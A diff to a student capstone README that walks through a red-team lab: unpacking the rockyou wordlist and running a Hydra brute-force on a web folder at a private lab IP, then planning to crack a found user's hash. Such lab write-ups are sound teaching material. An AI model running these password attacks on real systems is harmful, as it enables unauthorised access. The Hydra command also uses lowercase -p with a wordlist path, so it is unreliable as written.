Jay-Idrees/UPenn-CyberSecurity-Red-vs-Blue-Team-Metasploit-Kibana-Capstone/README.md

 - `gunzip /usr/share/wordlists/rockyou.txt.gz`

-- Hydra brute force action: `hydra -l ashton -p /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder/`
+- Hydra brute force action: `hydra -l ashton -p /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder/` Here http-get will go to the website which is the ip address that we have already provided and will navigate to the path like: `http-get 192.168.1.105/company_folders/secret_folder/`

 - On accessing the secret folder, a new username noted: ryan, need to crack its hash that is also provided in the secret folder